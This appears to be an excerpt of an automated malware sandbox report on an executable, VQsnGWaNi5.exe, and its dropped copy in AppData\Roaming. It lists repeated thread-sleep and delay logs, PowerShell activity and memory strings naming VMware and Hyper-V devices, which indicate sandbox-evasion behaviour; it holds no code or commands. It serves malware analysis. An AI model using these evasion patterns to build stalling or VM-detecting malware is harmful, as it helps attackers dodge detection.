Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -597016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -596891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -596452s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -594117s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -594000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -593891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -593781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -239828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -239718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -239600s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -239495s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -239375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -239265s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -239123s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -239002s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -238320s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -237931s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -237827s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -237718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -237609s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -237489s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -237374s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7508	Thread sleep time: -237265s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7408	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -25825441703193356s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7820	Thread sleep count: 8551 > 30
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7820	Thread sleep count: 1310 > 30
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -599343s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -599233s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -599124s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -599015s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -598905s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -598796s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -598687s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -598576s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -598468s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -598359s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -598245s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -598140s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -598031s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -597921s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -597812s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -597702s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -597593s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -597484s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -597374s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -597265s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -597156s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -597032s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -596906s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -596796s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -596687s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -596568s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -596446s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -596343s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -596234s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -596124s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -596015s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -595906s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -595796s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -595687s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -595577s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -595468s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -595359s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -595249s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -595139s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -595031s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -594921s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -594812s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -594703s >= -30000s
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe TID: 7808	Thread sleep time: -594593s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239874	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239765	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239654	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239543	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239421	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239308	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239169	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239046	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238937	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238827	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238718	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238609	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238452	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238343	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238230	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238109	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 237997	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 237812	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 237694	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 237513	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 598366	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 598243	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597350	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596452	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594117	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594000	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 593891	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 593781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239600	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239495	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239265	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239123	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239002	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 238320	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 237931	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 237827	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 237718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 237609	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 237489	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 237374	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 237265	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599233
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599124
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598905
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598796
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598576
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598468
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598245
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598031
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597921
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597702
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597374
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597032
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596906
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596796
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596687
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596568
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596446
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596343
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596234
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596124
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596015
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595796
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595687
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595577
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595468
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595249
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595139
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595031
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 594921
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 594812
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 594703
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 594593

Source: ywKvCTGbQjXP.exe, 0000000D.00000002.1887461012.0000000006568000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: od_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ywKvCTGbQjXP.exe, 0000000D.00000002.1882372695.0000000001026000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
Source: VQsnGWaNi5.exe, 00000000.00000002.1740589408.0000000008ED9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\|
Source: VQsnGWaNi5.exe, 00000008.00000002.1864122872.0000000000A37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
